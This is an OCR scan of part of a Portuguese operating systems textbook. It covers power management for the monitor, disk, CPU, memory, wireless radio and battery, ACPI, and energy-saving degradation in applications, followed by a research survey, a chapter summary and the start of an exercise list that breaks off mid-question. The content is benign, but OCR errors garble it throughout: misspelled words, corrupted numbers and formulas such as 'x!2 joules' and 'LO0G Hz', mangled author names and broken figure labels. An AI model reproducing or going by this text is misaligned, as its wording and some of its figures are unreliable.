a analise de cuslo-bencficio entre o desligamento frcqucn¬ 
ie do monitor e a recarga rapida da bateria para o usuario 
(que, provavelmente, nao desejaria essa preocupaęaoj. O 
desligamento do monitor impiica um esiado de dormenria P 
pois ele pode ser restabelecido {a partir da RAM de video) 
quase que instantaneameme ąuando qualquer tecla e pres¬ 
sionada ou o mouse e movido. 

Urna possibilidadc de mci bora men to foi proposia por 
Fliiiii c Satyanarayanan (2004). Elessugeriram queo moni¬ 
tor consisiisse em algumas zonas que pudessem ser ligadas 
ou desligadas independentememe. Na Figura 5.39, repre- 
sentamos 16 zonas usarido linhas pontilhadas para separa- 
-las, Quando o cursor esta na janeła 2, como mostrado na 
Figura 539(a) P somentc as ąuatro zonas do canto inferior 
direiio dcvem ser iluminadas, As outras 12 podem per ma- 
necer escu recki as, economizando 3/4 da poiencia da tela. 

Quando o usuario move o cursor para a janela 1 P as 
zonas para a janela 2 podem ser escureddas e as zonas por 
tras da janela 1 podem ser iluminadas. C outu do, como a 
janela I envolve novc zonas, mais poiencia e nccessaria. 
Se o gerenciador de jandas consegue perceber o que esta 
ocorrendo, ele pode automaiicamente mover a janela I 
de modo a se enąuadrar em ąuatro zonas, com um tipo de 
aęao itistanianea {&mp-to-zom aawn), como mostra a Figu¬ 
ra 5.39(b). Para reallzar essa reduęao dc 9/16 para 4/16 da 
energia loial, o gerenciador dc jandas dcvc compreender 
o gerenciamento de energia ou ser capaz de aceitar ins- 
iruęoes de outras partes do sisienta que o compreendam. 
Airuia mais sofislicada seria a capacidade de iluminar par- 
cialmente urna janela que nao estivesse com pieta me nte 
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Jan eta 1 
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__!_Janda 2 
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(a) 


(b) 


I Figura 5.39 O uso de zonas para reanimar a iluminaęao do monitor, (a) Ouando a j ariela 2 e selecionada, ela nao e movicia. 
(b) Ouando a janefa 1 e selecionada, ela e movida para reduzir o numero de zonas iluminadas. 


preenchida (por exemplo, urna janela contertdo pequenas 
linhas de texto poderia ficar com o lado direito das linhas 
escurecido). 

Disco rigido 

Um outro grandę vilao nessa historia e o disco rfgi- 
do. Ele consome energia substandal para manter-se giran- 
do em aha vetoridade, mesnio que nao existam accssos. 
Muitos computadores, espedalmente os laptops, param dc 
girar o disco após alguns minutos dc inatmdade. Quando 
o disco ć reąuisitado, a rotaęao e iuirializada de novo + bv 
fdizmente, mii disco parado fi ca hibemando (em vez de 
dormindo), pois ele leva tnis poucos segumios para girar 
rapido novamcntc, causa udo atrasos con$ideravcis para o 
usuario. 

Aiem disso, reimrializar o disco consome comidera- 
vel energia extra. Conseąiientemcnte, cada disco rem um 
tempo caractcnstico, 7^ muitas vezcs dcnlro da faixa dc 
5 a 15 segundos. Suponha quc o próximo accsso ao disco 
yenha a ocorrcr em algum tempo t no futuro, Se i < 7^ dc 
gasta menos energia para manter o disco girando do que 
para parado e depois rei nicią liza-lo rapidamente. Se t > T r 
a economia de energia faz valer a pena imerromper o giro 
do disco para reinicializado bem mais tarde. Se fosse possf- 
vel urna boa previsao (por exemplo, com base nos padroes 
anteriores de accsso), o sistema opcraeional poderia fazer o 
desligamciilo c economizar energia. Na pratica, a materia 
dos sistemas e conscrvadora e somente para de girar o disco 
após alguns mimitos de inatividade. 

Outra maneira de economizar energia do disco e tendo 
unia cache substandal de disco em RAM. Se mn bloco solici- 
tado esta na cache. Lim disco od oso nao precisa ser rei nicią- 
lizado para satisfazer a leitura. Da mesma maneira, se urna 
escrita no disco pode ser armazenada temporariamente na 
cache, um disco parado nao precisa ser reinirializado somente 
para tratar da escrita: o disco pode permanecer desligado ate 
que a cache esteja cheia ou que oconra urna lacuna na leitura. 

Outra maneira dc evitar que urn disco seja rriniciali- 
za do desnecessariamente ć Inzer com que o sistema ope- 
racional maiiienha os programas cm cxecuęao informados 
sobrc o estado do disco por rncio de mensagens ou sinais. 


Alguns programas tern escritas programadas que podem 
ser desviadas ou atrasadas. Por exemplo, um processador 
de texto pode ser aj usta do para gravar de tempos em tem- 
pos no disco o arquivo que esta sendo editado. Se o pro- 
cessador de texto sabe que o disco esta desligado naquele 
momento em que ele norma Imente escreveria o arquivo, 
cle pode atrasar essa escrita ate que o disco esteja ligado ou 
ate que um ceno tempo adicional ten ha decorrido. 

CPU 

A CPU tarnbem pode ser gerenciada para economizar 
energia. O software pode coiocara CPU de um laptop para 
dormir, reduzindo o uso de energia para quase zero. A uiii- 
ca coisa que resta a da fazer nesse estado e acordar quando 
uma interrupęao ocorre, Portanto, sempre que a CPU sc 
tornc ociosa, seja es p era udo por E/S ou porquc nao exisie 
nenhum irabalho para fazer, eia dormc, 

Em mu i los computadores, existe um rei ario na men to 
entre a voliagem da CPU, o ciclo do relógio e o uso de ener¬ 
gia. A voitagcm da CPU muitas vezes pode ser reduzida por 
software, cconomizando energia, mas tambem reduzindo 
o ciclo dc relógio (provavelmente de modo Lincar). Yisto 
que o eonsun io de energia e proporcional ao quadrado da 
vohagcm, cortando a vollagem pcla metade, a CPU perdc 
metade da rapidez, mas reduz a energia para 1/4. 

Essa propriedade pode ser explorada para programas 
que tein prazos de execuęao bem definidos — como progra¬ 
mas de visualizaęao multimfdia que devem descomprimlr e 
mostrar no vfdeo um ąuadro a cada 40 ms e ficam ociosos 
se fazem isso mais rapidamente, Suponha que uma CPU use 
A joules para exccutar em velocidade maxima durame 40 
ms e x/4 joules para execuiar na metade da veiocidadc, Se o 
programa de visualizaęao multimidia puder descompmmr e 
mostrar o ąuadro em 20 ms, o sistema operactonal podera 
exccutar em foręa total durame 20 ms, desligando em se- 
guida durame 20 ms e computando assim um uso total da 
energia da CPU de x!2 joules. De maneira allernativa, de 
pode executar com metade da energia c simplesmente cum- 
prir o prazo, mas tisando somente xł 4 joules. Uma compa- 
ra^ao da execuęao com vdoddade e energia totais duranie 
um iuiervalo de tempo e com metade da velocidade c um 
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qnarto da energia durante ura intervalo de tempo duas ve- 
zes maior e mostrada na Figura 5.40. Em anibos os casos, o 
mesmo trabalho e realizado, mas na Figura 5.40(b) somen- 
te meta de da energia ć consumida para faze-lo. 

Em urna tendencja similar, se o usuario esta digitando 
em u ma taxa de 1 caractere/s, mas o trabalho necessa- 
rio para processar os earacteres leva 100 ms, seria melhor 
para o sistema operacional detectar os longos periodos de 
odosidade e reduzir a veloddade da CPU a uni fator de 10. 
Em resumo, executar lentamente e mais efidente do que 
executar de mancira rapida, em termos de consumo de 
energia. 

Memória 

Existetn duas possfveis opęoes para economizar ener¬ 
gia com a memória, Piimciro, a cachc pode ser esvazlada e 
entao desligada. Ela pode ser sempre carregada da memó- 
ria principal sem qualquer perda de informaęao. A recarga 
pode ser feita dinamiea e ra pi da mente, de modo que desli- 
gar a cachc implica coloca-la cm c sta do dc dornienria. 

Urna opęao mais drastica c escrcvcr os eon te ud os da me¬ 
mória principal para o disco e entao desligar a própria memó- 
ria principal. Trata-se de uma bibemaęao, visto que pratica- 
mente loda a energia pode ser eortada da memória por um 
custo snbstanrial em termos dc tempo de rccarga, prmdpal- 
mente sc o disco esia desligado tambem. Quando a memória 
e desligada, a CPU tern de ser desligada tambem ou deve 
cxeailar da ROM. Se a CPU se encomra desligada, a imer- 
rupęao que deve acorda-la predsa la ze-la saltar para o códi- 
go na ROM de modo que a memória possa ser recarregada 
ant es dc ser usada. A despeito de toda a sobrecarga, o des- 
ligamcnto da memória por longos periodos dc tempo (por 
cxcmpk>, horas) pode ser i mport antę Ja quc reinicializarem 
alguns segundos a partir da memória e muiio mais desejavel 
do que reinicializar em um minuto ou mais por meio do car- 
i ega men to do sistema operacional a partir do disco. 

Comunicaęao sem fio 

Gada vcz mais, muiios computadores porta leis tern 
uma conexao sem fio para o mundo ex£erno (por cxempio, 
para a Internet). Os transmissorcs e os receptores dc radio 
nccessarios muilas vczes sao consumidores de energia de 

1,00 - 

^ 0,75 

r fl3 

| 0,50 
^ 0,25 

°0 T/2 T 

Tempo —*- 
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primeira classe. Em particular, se o receptor de radio esia 
sempre ligado com o objęlivo de receptar as mensagens de 
correio eletronico que estao chegando, a bateria pode des- 
carregar muito rapidameme. Por oiitro lado, se o radio c 
desligado, por exemp3o, após um minuto de odosidade, as 
mensagens que ainda vierem a chegar poderao ser perdi- 
das, o que obviamente e mdesejavcl 

Uma soluęao eficiente para esse probiema foi propos - 
ta por Kravets e Krishnan (1998). O porno prindpal des- 
sa soluęao explora o fato de que conipuladores móveis 
conumicain-se com estaęoes-base fixas, que tein grandes 
memórias e dis cos e nenhuma restrięao dc energia, O que 
eles propuseram e que o computador móvel envie uma 
mensagem para a estaęao-basc quando de cstiver quase 
desligando o radio. Daquele tempo em dianie, a esiaęaO’ 
-base armazena temporariamente no disco as mensagens 
que che garem. Quando o computador móvel liga o radio 
novameme, de avtsa a estaęao-base. Nesse porno, quais- 
quer mensagens aaimuladas pode ni ser emiadas para cle, 
As mensagens dc salda geradas enąuanto o radio esta 
desligado sao armazenadas temporariamente no computa- 
dor móvcL Sc o bu ller ameaęa saturar, o radio ć ligado c a 
lila e transmitida para a estaęao-base. 

Quando o radio deveria ser desligado? Uma possibili- 
dade e deixar o usuario ou o aplicativo decidir. Outra opęao 
e desliga-lo após alguns segundos de odosidade, Quando o 
radio deveria ser religado? Novamente, o usuario ou o apli- 
cativo poderia decidir ou o radio poderia ser ligado perio- 
dicamente para verificar o trafego de entrada e transmitir 
quaisquer mensagens enfileiradas. Obviamente, cle tam¬ 
bem deveria ser ligado quando o buffer de safda estivesse 
cheio. Varias outras heuristicas sao póssiveis. 

Gerendamento termicó 

Algo diferenie, mas ainda relacionado com a ąuestao 
da energia, c o gerendamento lenni co. As CPUs moder- 
nas ficam exiremamenie ątienies em decorrencia das al¬ 
ias vcloddades com que trabalham. Os computadores de 
mesa nonnalmente tem um ventilador e lei r i co interno 
para tnandar o ar ąuente para fora do gabinete. Yislo quc a 
reduęao do consumo de energia nao e uma questao priori- 
taria nos computadores de mesa, o yentilador geralmente 
fica ligado o tempo todo, 
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Figura 5.40 (a) Funcionamento com velooidade total. (b) Reduęao da voltagem a metade: nnatade da veioeidade e um quarto da 
energia. 
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Colti laptops a skuaęao e difereme. O sistema opera- 
donal precisa monkorar continua me nte a temperatura. 
Quando chega próximoda maxima temperatura permitida, 
o sistema operadonal tem de fazer urna escolha: ele pode 
figar o ventilador, que faz barulho e consome energia. De 
maneira altemativa r pode reduzir o consumo de energia 
por meio da diminuięao da iluminaęao da tda, da reduęao 
da velocidade da CPU e, rnais agressivameme, do desliga- 
memo do disco, e assim por dianie. 

Alguma entrada do usuario pode ser osada como guia. 
Por exemplo, o usuario poderia especiticar antedpadainen- 
te que o barulho do ventilador e desagradavel; assim o sis¬ 
tema opera donal reduziria o consumo dc energia cm vez 
de ligi-lo. 

Gerenciamento de bateria 

Antigamente, u ma bateria fornecia corrente a te se 
esgotar, para udo de funcionar em seguida. Hoje em dla 
nao: os laptops iisam baterias inteligentes, que podem 
se coimmicar com o sistema operadonal* Mediante uma 
reąuisięao, elas podem informar, por exemplo, voltagem 
maxima, voltagem atual, carga maxima, carga atual, taxa 
de descarga maxima, raxa de descarga auial etc. A maio- 
ria dos laptops tern programas que podem ser executados 
para obter e mostrar todos esses parametros. As baterias 
inteligentes tambem podem ser instrufdas para mudar 
varios parametros operadonais sob controle do sistema 
operacionaL 

Alguns laptops tem varias baterias. Quando o sisLe- 
ma operadonal detecta que uma bateria esta quase se 
esgotando, ele deve desativa-la e ativar outra, sem cau- 
sar nenhuma falha durante a transięao. Quando a ultima 
bateria esta no finał o sistema operadonal deve avisar o 
usuario e depois causar um desligamento metódico para 
garamir, por exemplo, que o sistema de arquivos nao seja 
corrompido. 

In ter face do driver 

O Windows tem um mecanismo elaborado para fazer 
o gerenciamento de energia, diamado de interface avan- 
ęada de configu racao e energia {advanced config unit i on 
and power interface — ACPI). O sistema operadonal pode 
enviar quaisquer comandos para o driver reąuisitando in- 
formaęoes sobre as capacidades de seus di$posnivos e sens 
estados atu ais* Essa cara ci ens o ca ć espccialmcntc impor- 
tante quando combinada com a caractenstica plu$ andplay , 
pois, logo após a imcializaęao, o sistema operadonal nao 
sabe ainda quais dispositivos estao presentes, sem falar em 
su as propriedades com relaęao a o consumo on a o modo de 
gerenciamento de energia. 

Ele pode ainda enyiar comandos para os drivers ms- 
truindo-os a coriar seus niveis de energia (olmameme, com 
base nas capacidades que ele aprendeu antes). Existe tam¬ 
bem algurn trafego na outra direęao. Em particular, quando 
um dispositivo — como um tcclado on um mousc — dctccta 


atividade após um periodo de odosidade, isso e um sinal para 
o sistema voltar a operaęao (quase) nomial. 

5.8.3 ] Questóes dos programas de 
aplicacao 

Ale agora vimos como o sistema operadonal pode re¬ 
duzir o uso dc energia nos varios lipos dc dispositivos. Mas 
tambem existe outra abordagem; dizer a os programas para 
gaslar men Oś energia, meśmo que isso leve a um empobre- 
cimenioda experiencia do usuario (mc]hor uma esperićn- 
cia pobre do usuario doque nenhuma cxperióncia quando 
a bateria morre e a luzse acaba), Em geral, essa mformaęao 
e passada adiante quando a carga da bateria esta abaixo 
de um certo Hm.iie. En ta o, os programas dcvem ser capa- 
zes de decidir entre degradar o desempenho para alongar 
a vida da baLeria on manter o desempenho e arriscar uma 
parada na execuqao por lalta de energia. 

Uma das qucsiocs que surgem quanto a esse aspecto e; 
como um programa pode degradar seu desempenho para 
economizar energia? isso tem sido estudado por Eli on e 
Satyanarayanan (2004), que apresentaram quatro cxcm- 
plos de como o desempenho degradado pode economizar 
energia. Iremos examInados a seguir. 

Dc acordo com esse es U ido, a iu lormaęao e apresenlada 
para o usuario em varias form as. Quando nao ha qualquer 
dcgradaęao, e apresenlada a melhor informaęao possweł 
Quando cxiste degradaęao, a fideiidade (exaiidao) da infon 
maęao apresenlada ao usuario ć interior ao quc da pode¬ 
ria ter sido. Veremos alguns exemplos de maneira suci ma. 

Para medir o uso de energia, FI Lun e Satyanarayanan 
desenvolveram uma ferramenta de software chamada 
PowerScope* Sua funęao e prover o per fi do uso da ener¬ 
gia dc um programa* Para usa-la, um compuiador deve ser 
conectado a um suprimemo externo dc energia por meio 
de um mulihnetro digilal contro lad o por software. Usando 
o multfmetro, o software pode lero numer o de miliampe- 
res que estao chegando do suprimemo de energia e, assim, 
determinar a energia insiantanca que esta sendo corisumi- 
da pelo compuiador. O que o PowerScope faz e periodica- 
menie coletar o co n ta do r de programa c o uso de energia, 
escrevendo esses dados em um arquivo* Após o lenni no 
do programa, o arquivo ć analisado para informar qua! e 
o consumo de energia de ca do procedimento. Essas medi- 
ęoes forma ram a base das obsemęoes dos pcsąuisadorcs, 
As medklas de economia de energia do hardware tambem 
foram usadas como lin bas de base contra as quais o desem¬ 
penho degradado foi medido. 

O priineiro programa medido foi um reprodulor de vh 
deo. m modo sem degradaęao, de reproduz 30 quadros/s 
em uma rcśol.ucao lotal cm corcs, Um modo dc degrada¬ 
ęao consistc em descartar a informaęao de eor e reproduzir 
o vfdeo em preto e branco. Uma outra degradaęao eon- 
siste em reduzir a frequencia de reproduęao, deixando a 
imagein piscantc ifliekering) e o filme com uma qualidade 
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irregular. U ma outra forma tle degradaęao consisce em re- 
duzir o nu mero de pixels em ambas as direędes, reduzindo 
a resoluęao espacial ou tornando a imagem most rada me- 
nor. Aęocs desse tipo economizam cera de 30 por cento 
dc energia. 

O segtmdo programa fot urn reconhecedor de voz. Ele 
eoletava a most ras do rrucrofone e constrma um modelo de 
onda, Esse modelo podeiia ser analisado em um laptop ou 
enviado por um canal de radio para analise em um com- 
putador fixo. Fazendo isso, a energia da CPU e econonii- 
zada, mas consome a energia do radio. A degradaęao foi 
rcalizada com o emprcgo dc um Yocabulario menor c u ni 
modelo acustico si nipie s. A cconomia nesse caso foi dc 35 
por cento* 

O exemp!o seguime foi o programa de yisuaiizaęao de 
mapas, o qual buscava os impas por um canal de radio. A 
degradaęao consistiu em reduzir ca da mapa para dimen- 
soes menores o u pedir a o semdor rem oto para o mi dr as 
pequenas estradas, reduzindo assim a guantidadc de bitsa 
ser transmitida. Novameme, houve um ganlio dc ccrca de 
35 por cento nesse caso. 

O guarto expeiinterno foi realizado com a transmfesao 
de imagens JPEG para um navegador da Internet, O pa- 
drao JPEG permite varios algorilmos, ntegociando entre a 
gualidade da imagem e o tamanho do arquivo. Nesse caso, 
o ganbo Lotalizou somente 9 por cento. Ainda, de modo 
geral, os experimemos mostraram gue, aceitando algimia 
degradaęao na ąualidade, o usuario pode dlspor de unia 
dada bateria durante um tempo maior. 



Pesguisas em entrada/safda 


Ejiistcni muitas pesguisas sobie entrada/safda, mas a 
maiorio enloca dispositivos espeeffkos, em vcz de E/S em 
geral. Muitas vezcs o objedvo e melhorar de algum modo 
o desempenho. 

Os sistemas de discos sao o exemplo tipico. Os ałgorit- 
mos dc escalonamento dc braęo dos discos sao urna area de 
pesquisa bastante popular (Bachmat c Braverman, 2006; 
Zarandioon e Thomasian, 2006), assim como os vetores de 
disco (Arnan et ab, 2007), A otimizaęao do ca min ho com- 
pleto de E/S tambem tern despertado imeresse (Riska et ab, 
2007). Tambem existem pesąuisas reiacionadas a sobrecar- 
ga cle trabalho dos discos (Riska e Riedel, 2006). Urna nova 
area dc pesguisas rclacionada aos discos c a gue se dedica 
aos discos flash dc alt o desempenho (Birrcll et ab, 2006; 
Cliang, 2007). Drivers de dispositiyos tambem obliverani 
alguma atenęao (Bali et ab, 2006; Ganapathy et ab, 2007; 
Padioleau cl ab, 2006), 

Um novo tipo de tecnologia de armazenamento e o 
MEMS ( mkro-ekarkal-mechaniarf systems — sistemas inicro- 
cletromecanicos), que pode, potcndalmcntc, substituir ou 
complementar os discos (Ranga swa mi et ab, 2007; Yu et 
ab, 2007). Outra area de pesguisa com altos e baixos c a 


gue iiwestiga a inellior forma de utilizar a CPU dentro do 
controlador de disco, porexemplo, para melhorar o desem¬ 
penho {GuriJinurthb 2007) ou para detectar vfrus {Paul et 
ab, 2005). 

Enibora possa causai espanto, os rdógios dc baixo de¬ 
sempenho ainda sao alvo de pesguisa. Em busca de bons 
resultados, alguiis sistemas operacionais Iimcionani com 
o relógio em LO0G Hz, o que acarreta um processamenlo 
excessivo* A pesguisa inyesliga como sc livrar dessa sobi e - 
carga (Elsion et ab, 2003; Tsaftr et ab, 2005). 

Os dientes magros tambem sao loco de grandę ime¬ 
resse (Kissler e Boyi, 2005; Ritschard, 2006; Schwartz e 
Guerrazzi, 2005). 

Dado o grandę mi mero de ciemistas da compmaęao 
com laptops e dado o tempo mkroscópico das baterias da 
maioria deies, nao deveria surpreender a existencia de tan- 
tos imeressados no uso de tecnicas dc software para geren- 
eiar e conservar a energia das baterias. Entre os tópicos de 
maior imeresse estao a escrita de códigos de aplicaęao que 
otimizem o tempo de espera dos discos (Son et ab, 2006), a 
busca de como fazer os discos gira rem mais devagar guando 
me nos utilizados (Gurumurthi et a!., 2003), a utilizaęao 
de modclos dc programas para prcver guando as placas dc 
rede sem fio podem ser dcsligados (Horn c Krcmer, 2003), 
a economia de energia para o VolP (Gleeson et ab, 2006), 
a avaliaęao dos custos de energia da seguranęa (Aaraj et 
ab, 2007), a programaęao mullimfdta com efirienda de 
energia (Yuan e Nahrstedt, 2006) e ate fazer com que u ma 
camera embutida detecte guando ha alg u-ern diante da tela 
e guando nao, desligando-se no segundo caso (Dalton e 
Ellis, 2003), Enire os assunios mais populares, um gue 
atrai grandę imeresse e o uso dc energia em redes de sen- 
sores (Min et ab, 2007; Wang e Xiao, 2006). Tambem e de 
imeresse a economia de energia em grandes conjuntos de 
servidores (Fan et ab, 2007, Tolcntino et ab, 2007). 


5.10 


Resumo 


Apesar de ser um tópico iniponamc, a entrada/safda 
muitas vczes e desprezada. Urna fraęao substandal dc qual- 
guer sistema operacional e rclacionada com E/S, gue pode 
ser rcalizada de tres maneiras. Na primeira, cxistc a E/S 
programada, na qual a CPU prlncipal ie ou escreve cada 
byle ou palavra e espera em um laęo eslreito ate gue da 
possa obier ou enviar o próximo dado. Na segunda, exisie 
uma E/S orieniada a interrupęao, na gual a CPU inidaliza 
uma iransferencia de E/S para um caractere ou unia pala- 
vra c segue para outra atividade atć gue uma intern!pęao 
sin a li ze a condusao daguela E/S. Na terceira, existe um 
DMA, no gual um chip sępa rado gerenria a transferenda 
com ple ta de um bloco de da dos, ocorrendo uma interrup- 
ęao somente guando o bloco for totalmente iransfcndo. 

A E/S pode ser estruturada em gualm nfvds: as rolinas 
dos servięos de interrupęao, os drivers dos di$posilivos, o 
software de E/S independente de dispositivos e as biblioie- 
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cas e os diretórios de spool de E/S que executam no espaęo 
do usuario. Os drivers dos dispositivos tratam os detalhes 
da execuęao dos dispositivos e fornecem interfaces unifor- 
mes para o restante do sistema operadonal O software de 
E/S independente de dispositivo realiza ta ref as como o ar- 
mazcnameiito cm buffers c o rdatório dos erros. 

Existem varios tipos de discos, induindo discos mag- 
neticos, RAtDs e discos ópticos. Os algoritmos de escalona- 
mento de braco podem ser empregados muitas vezes para 
mełhorar o desempenho do disco, mas a presenęa de geo- 
metrias virtuais complica tudo. Por meio do pareamento dc 
dois discos ć posswel construir um mci o dc armazenamen- 
to cstavd com cctlas propriedades utcis. 

Os relógios sao usados para controlar o tempo real, 11- 
mitando o tempo de execuęao dos processos, tratando de 
temporizadores watch-dog e fazendo canta bili dade. 

Os terminal baseados em ca racie tes apresentam di- 
versas ąuestoes relacionadas com earacteres especiais que 
podem ser lidos e sequendas especiais de escapes passwds 
de serem escritas. A entrada pode ser em modo natura! ou 
modo preparado, dependendo de quanto comrole o pro- 
grama quer ter sobre a entrada. As sequencias de escapes 
na sarda contro!am o movimenlo do cursor e permitem a 
inseręao e a remoęao de texto na tela* 

A maior parte dos sistemas UNIX utiliza um sistema X- 
- Windo w como base para a interface grafiea. Ele e forma - 
do por programas snbordinados a determinadas bibliotecas 
especiais qite enviam comandos graficos e a um servidor X 
que escreve na tela. 

Muitos computadorcs pcssoais u sam GUIs para suas 
saidas, Estas tem como basc o paradigma W1MP: jandas, 
kones, menus e apontador. Os programas com base em 
GUI em geral sao orientados a evcnu>s, sendo o tedado, o 
mottse e omros eventos enviados ao programa para serem 
processados tao logo des oeorram. Nos sistemas UMX, as 
GUIs cptase sempre funcionam sobre o X, 

Os cltentes magros apresentarn certas vantagens sobre 
o PC, em especial a simplicidade e a rnenor necessidade de 
mamitenęao. Experimemos com o terminal SLIM THTNC 
mostraram que com apenas cinco primitivas simples e pos¬ 
swel construir um diente com bom desempenho, mesmo 
para vfdeo. 

Por firn, o gerendamento de energia e urna ąnestao 
crucial para os laptops, pois o tempo de vida da bateria ć 
li mi lado. Varias lecnicas podem ser empregadas pelo sis¬ 
tema operadonal a firn de reduzir o consumo de energia. 
Os programas Larnbćm podem auxiliar nessa tarcia, sacrifi- 
cando algunia qualidade em prol do aumento do tempo de 
vida das baterias. 

Problemas 

I- Avanęos na tccnologia dc chips tem tornado posswel co- 
locar u ni controlador compieto, induindo loda a logi ca 


de acesso ao barramento, em um chip ba rato. Como isso 
afeta o modeloda Figura 1.5? 

2. Considcrando as veioridades listadas na Tabela 5.1, e pos¬ 
swcl realizar varrcduras cm documcutos obtidos dc um 
scanner em um disco E.I DE li gad o a um barramento ISA 
em velocidade total? Justifique sna resposta. 

3. A Figura 5.2(b) mostra urna forma de ter E/S mapeada 
na memória na presenęa de barramentos separados para a 
memória e os dispositwos de E/S, o u seja, primciro lenta- 
-sc o barramento dc memória c, m falha deste, tenta-se 
o barramento de E/S. Um estudante esperto de ciencia da 
couiputaęao pen sou no seguinte melhoramcnto: tema ni- 
-se ombos em paralelo, para aceTerar o accsso aos dispo- 
sitivos de E/S. O que voce acha dessa kicia? 

4. Imagine quc um sistema usa um controlador DMA para 
iransferencia de dados do controlador de disco para a me¬ 
mória principal. Considere tambeni que ele leva r 5 nsem 
media para obier o barramento c f 2 ns para transferir unia 
palavra pck> barramento {t i »Q, Dc pois que a CPU pro- 
grama o controlador DMA, quanto tempo sera necessario 
para quc sejam transferidas mil palavras do controlador 
de disco para a memória principal se for u ti li za do (a) o 
modo de urna palavra por vez, (b) o modo surto? Consi¬ 
dere quc ta nto o comando do controlador dc disco quanto 
a confirmaęao de unia iransferencia requerem a obtenęao 
do barramento para envio de urna pałavra. 

5. Suponha quc um computador possa Icrou cscrevcr urna 
palavra de memória em 10 ns. Suponha tambem que, 
quando urna interrup<;aoocorre r todos os 32 registradores 
da CPU mais o comador dc programa c a PSW sao colo- 
cados na pil ha. Qual e o mi mero maximo de interrupęoes 
porsegundo ąueessa maąuina pode processar? 

6. Os projetistas de CPUs sabeni que os programadores de 
sistemas opcracionais detestatn interrupęoes imprccisas, 
Unia nianeira dc agrada-los ć fazer com que a CPU parć 
de gerar novas instruęoes quando u ma interrupęao for si- 
na li zada, mas permita que sejam condufdas todas as ins- 
imęoes atualmeme em esecuęao e, em seguida, cause a 
interrupęao. Esia a hord agent tem algunia desvantagem? 
Explique. 

7. Na Figura 5.8(b} f a interrupęao na o e eon firma da a te que 
o caractere seguinte ten ha sido enviado para a impresso- 
ra. Da mesma nianeira, ela poderi a ter sido eon firma da 
corrctamente no infcio da rot i na de trata me nto da inter¬ 
rupęao? Em caso afirmativo, de unia razao para faze-ia no 
finał, como no tcxio. Em caso negativo, por quc? 

8 . Um computador tem um plpdtne de tres estagtos como 
most rado na Figura I ć(a). Em cada cido de relógio, u ma 
nova histruęao ć buscada da memória, no endcrcęoapon- 
taclo pelo PC (program counter), e colocada dentro do 
pipeline, quando entao o PC e inerementado. Cada ins- 
truęao ocupa exata nieme unia palavra de memória. As 
instruęóes dentro do pipę linę sao encaminhadas para o 
próximo estagio. Quando ocorre inna interrupęao, o PC 
atual e colocado na pilha e o PC e aj ust a do para o ende- 
reęo do tratador da interrupęao. Entao, o pipeline e des- 
locado um estagio para a direita c a primetra instruęao do 
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Lralador de interrupęao e buscada para dentro do pipeli- 
ne. Essa maąuina leni interrupęctes precisas? Jusiifique. 

9, Uma dpica pagina dc texto impressa coiUćm 50 linhas 
de 80 caracteres cada. linaginc quc uma certa impressora 
possa imprimir scis paginas por minuto e qnc o tempo 
para escrcvcr um caracterc no rcgistrador de saida da im¬ 
presjo ra ć tao pcqucno quc pode ser ignorado. Tern senti- 
do usar essa impressora com E/S orientada a mterrupęlo 
sc cada caracterc impresso rcqucr uma interrupęao que 
leva 50 ps para ser servida? 

TO. Expilque de que modo urn SO pode fadlitara instalaęao 
de urn novo dispositWo sem neccssidade de rćcom pilawa o 
do sistema. 

Tl. Em qual das quatro ca mada s do software dc E/S se rcaliza 
cada uma das segitinies atmdades: 

(a) Calcular a trilha, setore cabeęote para uma Idtura de 
disco. 

(b) Escreyer comandos nos registradores do dispositivo. 

(c) Yerificar sc o usuąrio tem permissao para usar o dis- 
positivo. 

(<o Convcrtcr inteiros binarios cm ASCII para impressao. 

12 . Uma rede local e u sad a como segue, Os usuanos fazom 
chamadas de slsiema para escrever pacotes de dados para 
a rede. O sistema operarional emao copia os dados para o 
bu Her do nudeo. Com i$so, ele copia os dados para a piata 
controladora dc rede. Quando todos os bytes estao segu- 
ros dentro do tomrolador, des sao eiwiados pcla rede a 
uma taxa dc 10 megabits/s. O controlador dc rede que os 
reccbc armazcjia cada bil um microsscgundo após cic ter 
sido ciwiado. Quando o ultimo bit cli ega, a CPU no desti- 
no e imerrompida e o nudeo copia o pacote quc acabou 
dc r ccc ber para o buffer do nudeo para inspcdorta-lo. 
Uma vcz sabido quai e o usuario destinatario, o nudeo 
copia os dados para (3 espaęo do usuario. Sc presumirmos 
quc cada inłerrupęao c scu respeaivo proccssamemo le- 
vam 1 ms, que os pacoLes sao de 1.024 bytes (ignore os 
cabeęalhos) e que a copia de 1 byte leva 1 ps, qual e a 
taxa mMma a que um processo pode eiwiar dados para 
um outro? (Presom a que o emissor fique bloąueado ate 
que o trabalbo seja fiiializado do lado do receptor e unia 
eon firm a ęa o tenha sido kita. Para sEmplifkar, considere 
quc o tempo dc obtenęao da confirmaęao 6 peąucno o 
sufidente para ser ignorado.) 

13. Por quc os arquivos dc safda para a impressora normal- 
mente sao cnlocados cm um spooi no disco antes dc se¬ 
rem impressos? 

14. Um RAID mvel 3 e ca pa z dc coni gir erros dc bit u ni co 
usandosomente um disco de paridade. Qual e o propósito 
do RAID mvel 2? Afinal, ele tambem só pode corrigir um 
erro e gasta mais discos para fazę do. 

15. Om RAID pode falhar se dois ou mais dispositivos qnc- 
bram dentro de um ęurtO intervaio de tempo. Suponha 
que a probabiiidade de um dispositivo ąuebrarseja dada 
por p. Qual e a probabiiidade dc um RAID dc tacionado- 
res falhar em uma dada hora? 


16 . Com parć os nfvęis do RAID (0 a 5) com rclaęao ao dc- 
sempenho na leitura e na escriia, ao excesso de espaęo e 
a conftabilidade. 

17. Por que os dispositivos dc armazenamento ópticos sao ine- 
rentemente capnzes de densidades de dados maiores do que 
os dispositivos de armazenamento magneticos? {Nour. esic 
pro bierna requer algum conhed niemo de ffsica e de como 
os campos magnet icos sao gerados.) 

16. Quais sao as vamagens e as desvamagens dos discos óticos 
sobre os discos magnet i cos? 

19 . Se um controlador de disco escrcve os bytes qne ete rece- 
be do disco para a memória tao rapido quamo a taxa de 
recebimento, sem qualquer esąuema de buffer interno, o 
entrelaęamenlo e concebivdmente lilii? Discuta. 

20 . Se um disco apresenta entrdaęamento dup!o, cle tambem 
preetsa de toręao cilmdrica para cvEtar a faHa dc dados 
d ura mc um posiciooamento tri Ilia a triłha? Comentc sua 
resposta. 

21 . Considere um disco magnetico de 16 cabeęas e 400 cilin- 
dms. Esic disco esta dividido em quatro zortas de 100 d- 
lindros cada, com dlindros em zonas diferentes contendo 
160, 200, 240 c 280 setores, respcalvanieme. Considere 
quc cada setor contem 512 bytes, que o tempo media de 
busca entre dlindros adjacentes e de l ms c quc a rotaęao 
